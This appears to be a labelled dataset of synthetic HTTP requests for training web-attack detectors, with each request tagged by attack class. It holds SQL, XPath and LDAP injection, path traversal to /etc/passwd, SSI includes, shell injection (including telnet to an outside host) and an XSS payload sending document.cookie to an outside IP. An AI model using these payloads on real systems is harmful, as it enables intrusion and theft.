GET /utadns2/d7ttex/PtM9e5e/0CDhGQc/eDiy0loekbTWMM5Y/erpcT46HfyDYqj_ur.sh?ptmu7imei1si=36&yaeacuttbhTdn=22544&ttolohve=eateuRs&Xnhrnraco=passthruon3n&qmhrihjg3oy=dofecbuat7seiframes4&aaiitw=c&roodjp3vnt=d%40&child4zjZqGHx=s.uHR&updateMqZ.kh@2=81773&Hnof4=20503&iy=mgscriptiga%3Dg&ohikzc6aonwu=%27+%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F4279%2F**%2FFROM%2F**%2Fer%2F**%2FWHERE%2F**%2F%28+%27%27++++%3D++%27++%2F**%2F&imfouaae5mxe=iqxOurdy6PZI&iotmsn2nwE=%2FND HTTP/1.0
Host: www.sel3.de
Connection: close
Accept: */*;q=0.0
Accept-Charset: isiri-3342;q=0.6, iso-8859-9
Accept-Encoding: compress;q=0.6, deflate, identity
Accept-Language: teh7br-ietric, cedch6en-ptwhhl4, re4naa-Ialqcn;q=0.0
Cache-Control: max-age=561
Client-ip: 215.204.118.143
Cookie: ehcfue=csrn
Cookie2: $Version="01"
Date: Thu, 08 Jul 04 09:45:45 GMT
ETag: W/"O31nD@J3Iu0A1HEKQNyE"
Expect: slai
From: sheo@RafNi.uk
If-Modified-Since: Wed, 17 Oct 07 04:41:04 GMT
If-Unmodified-Since: Mon, 18 Oct 04 21:41:00 CET
If-Match: *
If-None-Match: "yo2o7LlG6dr701a7PRs"
If-Range: Sun, 13 Sep 09 17:59:33 CET
Max-Forwards: 88
MIME-Version: 4.3
Pragma: Df='n2'
Proxy-Authorization: NTLM ZXR0dGlub0RpZjRlZTZvZTdkc2FubjZhOXRhc28ybmlhbm1vcmRueGls
Authorization: eptd iSea=snwne
Range: 909400-,77915-,-01017
Referer: http://AnwshOnh.com/sLanrj/dlKnsf.css
TE: gzip,gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: oarvtcgne/1.3.2.2
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/1.2 64.160.114.64, 4.9 www.bzwpSBd.jpg, 3.2 www.zSsrwCp.htm
Transfer-Encoding: identity
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42474
Start - Id: 48960
class: XPathInjection
GET /vp/hdoSlfoa36t1ln/fwindow.openZ4WNuJMS_pxF/hpViK-mrdNQpM_VR/ngfRs/fIj/_-Bplike@tvbscriptftdrophfA/huywas3glwsPvt/Tnu77anrb2vycRnl/rawncrn/7bvfklohhu1aIethAe.htm?ki6W7aGl_QCf=tliframeab&evsiarIwtaH=55177+++++or++++1%3C+++++ktuecz%2FLi9%2FfDn%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D72%5D+or++40%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&r3Bn8Fim=tphpi&rlaqwltsgtetOa=1jR4L%404c&wwethbr=ytDAdFAatuhNmefntp&lmav6etbaifd=12207808&s35bn=nAisawz3&scriptL77tpsJrbO=1&p4e=nwo&XhC0YJ_oA=7&YjR9=dIEcsfvnpess&r5e=23&mueaedonoiscsoI=HrUi HTTP/1.0
Host: 27.238.76.181:30
Connection: rit6
Accept: audio/*, video/*, video/*
Accept-Charset: x-mac-arabic, iso-8859-15;q=0.1, gb2312
Accept-Encoding: *
Accept-Language: a-Ierow, ssnei-t
Cache-Control: max-stale
Client-ip: 170.112.198.15
Cookie: hoaDdMoywvjmt=52;rVWYiqa=y)b' rov8~e;
Cookie2: $Version="580"
Date: Fri, 26 Oct 07 01:03:41 GMT
ETag: "FUkp6cY6gug6IFvU"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Sun, 27 Jul 08 10:53:53 GMT
If-Unmodified-Since: Mon, 07 Mar 05 07:19:13 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 30 Jul 05 10:36:47 UTC
Max-Forwards: 7
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: Basic aHNoYmNkOm5mZUllZWhl
Range: 5-
Referer: /IIhj/rwtiaco/NnrnaHe.jpeg
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: aTl.M0sZA http://www.tim2apsc.de
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/3.4 www.otitnae.jpeg, 9.5 www.hleheOth.tiff
Transfer-Encoding: compress
Upgrade: 6cwot3/1.9
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 58.153.30.65
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48960
Start - Id: 45564
class: PathTransversal
GET /dkwypOEzZ0kRKhZR/soewTv_8z/saSbkYHlRjAyN/wa/irarwSVUlf@VyB.png?renetoollkih6dE=ou&walswnid=oM6gmt4R&DziysEnXE=sUheveE_n&WwastnEli=5309396&net4ai3nsihxk=%5CWINNT%5Csystem.ini&enylmsseht6fea=tmpg&phmSse=0&R83=2brgXU.&Sr=3499&rcegefd=lzhpW5&maiaeiuns=is%407NthWZKzB HTTP/1.1
Host: 73.164.219.33
Connection: keep-alive
Accept: video/*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: tWyzH-saxwe, nf-jeot
Cache-Control: min-fresh=0
Client-ip: 164.135.230.128
Cookie: 26ejuiimmAao=nRil'sp h%ud;AstdinallPwGinboot.iniEb=8Xip@exXl;qrpLOlhhee=taHY9YLf3t;anr6fp=08496;tiemrEBwoi=0826195030;t4elqo9=cef1nehnde8EU
Cookie2: $Version="88"
Date: Wed, 15 Aug 07 01:17:58 GMT
ETag: "Qlz3rPdG2rpqtnpu"
Expect: 7Sjsoaml
From: kccnlkv2@rodignu.de
If-Modified-Since: Fri, 28 May 04 19:58:07 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "ClOJ79aKmE72qeAOyhBb"
If-None-Match: *
If-Range: "Z@A5VKN5TR3g4pnbYeNg"
Max-Forwards: 24
MIME-Version: 9.4
Pragma: bni0ia=czmr9c
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: -2
Referer: http://www.4Ipsnu8.de/ro7a/qHdC/dhnYoi/Tlelmkxh/Giac4se.bin
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: If-Unmodified-Since
User-Agent: bwoc6lcI
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: 5.6 20.210.5.114
Transfer-Encoding: compress
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45564
Start - Id: 48222
class: XSS
PUT /mhWLV@tPoQoN6snFZ/to90Hr7-RJbSEB/ilg2haeD/LsystemrSZn/enrixh/vac2/ne0a7/mwete2nbilTgweatmP/trordoshr/ehowUeahbspt74/wIdT2ajsvineiw2/0fytbttaw8p.js? HTTP/1.0
Content-Length: 155
Content-Language: s,ayc,odc
Content-Encoding: compress
Content-Location: /wxEiwh/yitha5mp/tMzmioi/tho0oerb/tTehe9tc.nsf
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 14 Jan 05 18:29:43 GMT
Host: www.eg1iyueur.net
Connection: keep-alive
Accept: video/*;q=0.1, video/*;q=0.8, text/*;q=0.5
Accept-Charset: iso-8859-8, iso-8859-1, koi8;q=0.8, gb2312;q=0.6
Accept-Encoding: compress;q=0.4, deflate;q=0.5, gzip, gzip;q=0.5, gzip
Accept-Language: *;q=0.6
Cache-Control: max-stale=604
Client-ip: 43.56.9.140
Date: Thu, 14 Oct 04 21:18:56 GMT
If-Unmodified-Since: Tue, 16 Jan 07 01:27:48 UTC
If-Match: "rSup6I63t.FLx3zMMdc"
If-None-Match: "GwJ6RUBTiUbe8HTdg"
If-Range: Sat, 05 Dec 09 22:49:23 UTC
Max-Forwards: 392
Authorization: Digest realm
Referer: http://22oEtak.org/aemtt/nthaesz/ne49tnih/loson.jsp
TE: chunked;q=0.8,deflate,trailers
User-Agent: <div style= "    behaviour:  url([http://www.ri.com/script/thuros.cfm]);"   >
Upgrade: 9a5/8.2, n3n/3.3

inEJOjBxtermBBE=4jtwte&erylfeiyncteio=i9e&hsut=2tOKFv&sasitrmsnbpr=051390&loicilxtu=1254445&Gkcamreplace=iet&Erdnsi=Ehn'&ifrtoo=idr&wbcEugpismvta=1837982

End - Id: 48222
Start - Id: 46267
class: PathTransversal
GET /elio/amtttaotos7ee.exe?Xm9TbB=%2Fetc%2Fhttpd%2Fhttpd.conf&o4DsfhinoI=oiIh%40NP7g6oy&eergcsleggajbi=+0ed&ywJsjq822kii=3&AeimestdtelThb=760910&ODDIO9=hlt0aylgewh9&nlsdid=ru&obirourutet=tabigel HTTP/1.0
Host: 236.53.212.53
Connection: nsaxtR6e
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=667
Client-ip: 117.131.231.99
Cookie: asonIewUE=no19Kuhinm0suomu;9riokm=85355828;sh=haleltqrkadUIx
Cookie2: $Version="45"
Date: Thu, 03 Feb 05 06:24:04 GMT
ETag: W/"zjbRV5pdy3nxjAnt"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 18 Jul 09 09:43:05 CET
If-Unmodified-Since: Sat, 12 Feb 05 22:45:52 CET
If-Match: "OC.S91f7VOZZ5ai6"
If-None-Match: "KfGa4I33X5fXQmtG"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: Digest qop=ctrsh
Range: 5-,79312-76,-8628
Referer: /BOgE8ef.sh
TE: gzip;q=0.8,chunked,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: omrenil2eeph
UA-CPU: PowerPC
UA-Disp: 6002,8007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: 9.4 www.Iqtes.jpg:12
Transfer-Encoding: gzip
Upgrade: Su9qj/8.6, baec/7.2
Warning: 687 www.ndt99mt.png:13587 "extsrsgust" "Thu, 14 Feb 08 08:06:55 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46267
Start - Id: 41902
class: SqlInjection
GET /resvaAdhmq8ur/eokyaa3lnPottOhOe8pe/cewagel/rXXWfgk-ysqPZVL1N4il/aM9ug2_/pTW/ciRuTrTtle6ytTeloww/le26teoaog.jpg?lsCRShtpassJ4V=lhtscbawotfoe&3Tm0aitwm6wee=8800&5eyh=0dx&to=%27++OR++++%271teerm9dil%27+++++%3C++++%27X&nntsor5eedina=yha HTTP/1.1
Host: www.ecraDxoee.biz:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: min-fresh=5
Client-ip: 199.227.44.84
Cookie: wealteldt=834051
Cookie2: $Version="384"
Date: Wed, 19 Dec 07 22:37:58 CET
ETag: "ofotsShZb@38oZjIsB"
Expect: 100-continue
From: whodpi@rrheriuA.net
If-Modified-Since: Tue, 19 Jul 05 21:15:05 GMT
If-Unmodified-Since: Wed, 04 Jul 07 19:15:59 GMT
If-Match: "j74xvNRnbgbk302FwkF"
If-None-Match: *
If-Range: Sat, 15 Nov 08 11:01:21 UTC
Max-Forwards: 5
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Digest cnonce="rjl8"
Range: 814292-
Referer: /esurtrK/ueifi0ho/efflee/rpttD/baah.rar
TE: trailers
Trailer: Via
User-Agent: t1KXhpZbYD http://www.p6gra.gov
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/4.6 172.53.55.129, Oft/8.5 www.ooghtst9.tiff, FTP/5.5 96.241.196.77
Transfer-Encoding: identity
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 643 206.216.27.149 "suiowsouaeabcnttoryg" "Thu, 27 Oct 05 01:48:14 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41902
Start - Id: 37549
class: LdapInjection
PUT /wcn0t4ydtaieqTo/nwus6miseIt/wFcsshsV02.xXy6/nv8Xw5.5PD/aazbZANqZM0m-/cprxD.htm? HTTP/1.0
Content-Length: 271
Content-Language: Essso
Content-Encoding: deflate
Content-Location: /s6dikn/umcaw/l9Oe/o6amcyT/tife.png
Content-MD5: dHBvbzVodHJvaVRhdGJjbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Jan 08 07:28:46 UTC
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: 243.250.236.23:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity, identity;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 115.143.65.85
Cookie: qizc=885;lCiCofkdvlaedy=se+w:$;lvneaore=904;sxo0qi5zi7d=c2pt9
Cookie2: $Version="00"
Date: Fri, 05 Dec 08 19:23:02 UTC
ETag: "DKMeyFEGPC-DDbSpr"
Expect: 3hainp=yeeT
From: nIt1h@rvrs.org
If-Modified-Since: Tue, 29 Jul 08 03:45:53 CET
If-Unmodified-Since: Fri, 13 Mar 09 13:25:34 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "FfXz0MQlWO0Py95pXt"
If-Range: "qap5vEFQmzA_r_TF"
Max-Forwards: 9
MIME-Version: 7.0
Pragma: t=fnrobil
Proxy-Authorization: Basic bWZydGV3dDpvdGlp
Authorization: NTLM emxsb2Rhc3FjOWVuZHRiZGp0eVNpdHlzZGUxc2k0c3JSaW8wZXc=
Range: 0516-7855,069180-,334-
Referer: http://www.es8mea.org/xnNicfne/us0eofoa.asp
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: 5gtAdyimoo/4.0.9
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 1680x065
Via: 5.9 216.20.13.22
Transfer-Encoding: 7sew
Upgrade: Uzteet/0.5, dhot7e/3.9, dtjlO/6.3, Whr/7.3, r5he/4.5
Warning: 983 109.244.195.91 "L7Uqnd6Rnxrtrw" "Mon, 04 Apr 05 04:37:49 GMT"
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aiML=836)(&(objectClass=btk)(|(sn  =   esd)(cn=8 J*))&RtIIeepIs694=nch&aSyanteSIrii=ajRA&tytojiiL=arm2:$rEidrs0h&3eY61GTEdX1=silrmotranull&enwl=690614710&srjat=Vo6p9nb8joO4oho&rmisLep=aHc&mhckNCovcmdB=svgi4egnhno4giR&bt=e&htpass.WaPzCa=r

End - Id: 37549
Start - Id: 47102
class: XSS
GET /esslwnzoaorad/CTinm4node9VS.whaving8/eab@J9/Veo/ertidNo44cNebkx/ietsotuhfti7s/ra/xyy3dbzseeetmeqMbp/scriptOnMEs_ZZYefrxp_.php4?6PHj=%3Clink+rel%3D++%22stylesheet+++++%22++href+++%3D+%22+javascript%3A++++%5Bwindow.open%28%27http%3A%2F%2F178.43.127.75%2Fns.pl%27%2Bdocument.cookie%29%3B%5D++++++++%22+++%3E&shhliizitbnetth=8856 HTTP/1.1
Host: www.trdnb.cz
Connection: dedrKrno
Accept: audio/*, application/zip, text/*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: 9h3y-ep;q=0.3, SeAnsk-chTauo5;q=0.1, i-h;q=0.8, nte-Nt5;q=0.4
Cache-Control: only-if-cached
Client-ip: 51.141.13.228
Cookie: ANs59=c2I_iThnld;E.Baccess_logrgdawD.=hXA443@1iT;fres5o=t4se
Cookie2: $Version="1"
Date: Wed, 28 Mar 07 20:51:52 GMT
ETag: W/"0k_Eh5QzzVf7sgiEF"
Expect: SuneNo=naithni;emlsz
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Thu, 13 Jan 05 23:29:20 CET
If-Unmodified-Since: Sat, 06 Oct 07 07:07:00 UTC
If-Match: "Vgdv77E8Qywy77kX5A9"
If-None-Match: "Tnw7pnDlBwV9uyUb96h"
If-Range: Fri, 28 Nov 08 14:11:57 UTC
Max-Forwards: 3064
MIME-Version: 7.9
Pragma: pNdse2w='ntoo'
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: clanh toeioab=N3shitr
Range: 74-7756,9-
Referer: http://eoqamn.gov/redst/rt6elr.php3
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/4.9 (X11; U; SunOS sun4u 2.1; f1-is; rv:1.3.0) Gecko/39061821
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 320x898
Via: FTP/4.5 www.hhacseim.css
Transfer-Encoding: bhu3; bcqahef=eintli
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47102
Start - Id: 36781
class: OsCommanding
GET /bLEbBCM_3D2SZM/oLg5q0YPmOUTR2d69Z/up8o8udes/asHtFq.xm2g9_/fXuEZOkA0MGGMNuvr1.v/SyioctofU/Zuv5/ucy6asjhcotAd5o/allanbiGRqjHfgody/L5RpYaPhRGninsert5/6qz8OX.jsp?d6ud=d0SLvOwR6&4MRuhtpassLqt=ie&t6emt95amtcit3Q=reoO1&e7ileaGe5nlo=hszdsNt&0d-pEp=oianull%7Elnewft3k%3A&eiTrh=%5C%22+++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+++www.etnatr.com+61917%5C%3B&aygTayi=43578274&riuraoioesln=arwtoopr4&YLMjimg=i%3Aeij+trtdPxsrnn&djlEmugN=sK9HiDy3Wk HTTP/1.0
Host: 12.215.69.249
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 183.149.193.186
Cookie: lifetcdastseo1=87673155;_boot.iniautoexecconnect5K=autoexecwm2]td:oeoi;eojsrrqo=\ i
Cookie2: $Version="60"
Date: Tue, 20 Nov 07 17:39:38 CET
ETag: W/"dhJetYBuk7aifOA"
Expect: tYl5irs
From: hqdnlp@uehby4G.ch
If-Modified-Since: Sun, 14 Mar 04 10:39:25 GMT
If-Unmodified-Since: Sun, 26 Dec 04 20:40:07 GMT
If-Match: *
If-None-Match: "XidTsYtibPuSdSM"
If-Range: Fri, 28 Aug 09 09:17:40 UTC
Max-Forwards: 016
MIME-Version: 5.1
Pragma: a2ign=ct
Proxy-Authorization: NTLM NWl0Y25pb3Jha096ZWhmZXBzbmxoZW1LbTdlb25zaDJDdDVubnRib3RuaHNlZg==
Authorization: wyboL acphzxa=ieoTe
Range: 907-5,-807
Referer: /maEis7w/lcdtaee/artpb.tiff
TE: trailers,gzip;q=0.4
Trailer: Cache-Control
User-Agent: ouf1e6ljsdwraei
UA-CPU: MIPS
UA-Disp: 8446,438,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/9.8 212.141.128.165, 0.0 www.rtqny.html
Transfer-Encoding: gzip
Upgrade: lNc/6.5, 7nli6/7.0
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 5.176.183.129
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36781
Start - Id: 43159
class: OsCommanding
GET /sOPO-ZGcZ.Ec_@w1Rb.php?IwgetXv4=216&7oeduEa2cPns=%7Cecho++++%22++Content-Type%3A+text%2Fhtml%22+++++%3B+++++echo+++%22%22+%3B+++id+++++%5C0 HTTP/1.1
Host: 139.61.224.75:3
Connection: keep-alive
Accept: text/xml, audio/*;q=0.7, application/zip
Accept-Charset: hz-gb-2312;q=0.2, iso-8859-15, x-mac-hebrew;q=0.0, euc-kr;q=0.7, gb2312
Accept-Encoding: *
Accept-Language: ueD9a-jef;q=0.8, axntmtns-o1tT, lrgO0hb-idorBm, heq-zuefttb
Cache-Control: max-age=351
Client-ip: 147.97.110.132
Cookie: ZgH15j3d=wOo
Cookie2: $Version="36"
Date: Tue, 26 Dec 06 21:09:34 GMT
ETag: W/"Wm-uQG@VhFKtK.gNS7"
Expect: ucdhrA
From: riAeyrh@tgaMea.st
If-Modified-Since: Sat, 07 Aug 04 16:20:00 UTC
If-Unmodified-Since: Sat, 02 Jul 05 05:47:30 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 04 May 07 05:47:31 UTC
Max-Forwards: 3165
MIME-Version: 1.6
Pragma: dt='6ol'
Proxy-Authorization: 4lhm thmdu=aoeoa
Authorization: Digest realm
Range: -1
Referer: http://uilfcne.fr/ntna/srAonsf/juatrodv/tnyyiTf8/tRei.swf
TE: chunked;q=0.8
Trailer: If-Match
User-Agent: Mozilla/5.8 (X11; U; SunOS sun4u 8.8; ua-oi; rv:0.1.1) Gecko/95556456
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 807x674
Via: a4f/3.5 63.135.117.152:4604
Transfer-Encoding: compress
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 9.181.32.5
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43159
Start - Id: 45151
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: 26.67.137.104
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1254;q=0.7
Accept-Encoding: 
Accept-Language: rfder-ein, ietSqRep-3o, me-5Rcmq
Cache-Control: no-transform
Client-ip: 240.134.41.171
Cookie: H5ZkNQ=e=ga)passwdhswiopenupdatee eftrlink;E0rTb3=?u|in6Mst;Ej9t2=shduge
Cookie2: $Version="37"
Date: Thu, 07 Aug 08 05:46:19 UTC
ETag: W/"CBooSHRYAYcfdV@Ja7To"
Expect: sIseObpe
From: hdOf9re@eutwEh.uk
If-Modified-Since: Wed, 24 Sep 08 08:27:01 CET
If-Unmodified-Since: Mon, 31 Aug 09 02:03:32 CET
If-Match: *
If-None-Match: *
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 9680
Pragma: no-cache
Proxy-Authorization: Basic b2U1UnFvOnlOZWVyc2E=
Authorization: Digest uri=/depBmojv/i0anvi/ertltan/ssor/aleN.msf
Referer: http://m9zbn.gov/ashiesu/nomn/gbwjc/0n6g/l4sa5n6A.css
TE: trailers
Trailer: Host
User-Agent: uvyQdY3xo http://www.vstier.be
Via: 6.8 www.lsreEs5r.html:547
Transfer-Encoding: identity
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
Warning: 845 www.yohtvu.htm:3657 "hi7s4a" 
X-Forwarded-For: 249.70.128.210
----: ----------------------------------

null

End - Id: 45151
Start - Id: 40598
class: SSI
GET /oz7_bARyMkxzq@9hxl75/acrh2lg2g/ta2E/_ZeMvYIOhttpncI5/m0eemreoinuac9atgaOo/oFb5rP0T2AalY4vyPfG/eVS8v@hNe.html?ndsonduaig=%3C%21--%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E HTTP/1.0
Host: www.nctug.ch
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: euc-jp;q=0.5, euc-jp;q=0.3, x-mac-cyrillic;q=0.2
Accept-Encoding: compress, identity;q=0.5, compress;q=0.5, deflate, compress
Accept-Language: *;q=0.7
Cache-Control: ri=oi4o
Client-ip: 26.51.86.223
Cookie: tcaps4ihdtee=24628
Cookie2: $Version="979"
Date: Sat, 20 Oct 07 14:38:24 GMT
ETag: W/"bb110ijb0AjJQj0"
Expect: 100-continue
From: ueCnf@oprUeitufa.org
If-Modified-Since: Mon, 31 Jan 05 14:52:04 GMT
If-Unmodified-Since: Mon, 16 Oct 06 23:28:42 GMT
If-Match: *
If-None-Match: *
If-Range: ".hirn7vA8bFml_5T2"
Max-Forwards: 5789
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ekoie
Authorization: Digest uri=http://www.nHm6rtir.gov/eshae/ab9m9/nrbjn/pe7be/gsztoEe.js
Range: 67529-
Referer: http://euaen.net/y46veqwe/xse4u/otLqs/abetb.aspx
TE: chunked;q=0.0,deflate,gzip
Trailer: Warning
User-Agent: artaitt7os (eh@Mb4v; p9DlK@@bnH)
UA-CPU: PowerPC
UA-Disp: 953,006,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: 8.8 www.tadib.tiff:909, 1.9 111.169.130.109
Transfer-Encoding: deflate
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 305 210.240.173.34 "ntioprsmAicmwedcere" "Sat, 11 Dec 04 18:18:56 UTC"
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40598
Start - Id: 46376
class: PathTransversal
GET /sYEGBYTOKoJ9nVs2/emjudmiL8egzA/wieooyoFBC8cnheaoye.php3?ertgoh1gehaeoO=a+0oEr%5Da%3A%29f+l%3Azinput1&0eeH=+nhrstgeyNclih&8Q5EaI.4C.Y-=rju629UxT&xrophpGOJ=openlre&eqreogJtzNMMgsa=apMttae3add+&trren3=%7Er&vcdauneSc=roouu&o5dizwh7b=hrh0&onnptp=%2Fetc%2Fpasswd HTTP/1.0
Host: 232.150.190.131:176
Connection: close
Accept: video/mpeg;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: max-age=90
Client-ip: 86.247.207.18
Cookie: seEty=o;aR2tsfoxAkoiR=57
Cookie2: $Version="86"
Date: Sun, 14 Sep 08 07:17:02 CET
ETag: "GFsg.faK@trgN@CsoV"
Expect: 100-continue
From: cewts@1fgr.fr
If-Modified-Since: Thu, 05 Oct 06 16:33:05 GMT
If-Unmodified-Since: Sat, 12 Jan 08 21:14:00 UTC
If-Match: "kMla4HoPweULTAzJn"
If-None-Match: *
If-Range: Sun, 29 Aug 04 02:20:03 UTC
Max-Forwards: 430
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: eIymk ItnthXy=ursdHCat
Range: 2-1818,846125-
Referer: http://htio.biz/ieuiu0S/eojr5u/hwirr5Si/cqorjgr.asp
TE: deflate
Trailer: Date
User-Agent: ip6H9mjQ http://www.ihrtegxi.biz
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: o3r/9.7 148.141.3.138, nee/0.6 www.eaakn.jpeg
Transfer-Encoding: compress
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46376
Start - Id: 48648
class: XPathInjection
PUT /rlA./buim9/aoexUC.js? HTTP/1.0
Content-Length: 394
Content-Language: sea9i,d
Content-Encoding: identity
Content-Location: http://www.hy7t.org/t8tacl/uppd/tiie/a3ersi.gif
Content-MD5: Y2NyWWhyeWN0MHd0cmxhZg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Dec 07 04:29:17 CET
Last-Modified: Sat, 14 Oct 06 05:18:11 CET
Host: 239.107.242.185
Connection: erdruoti
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: taeww8fx-4Qcs8;q=0.6, gssolnaD-ersaea;q=0.5
Cache-Control: only-if-cached
Client-ip: 43.212.151.158
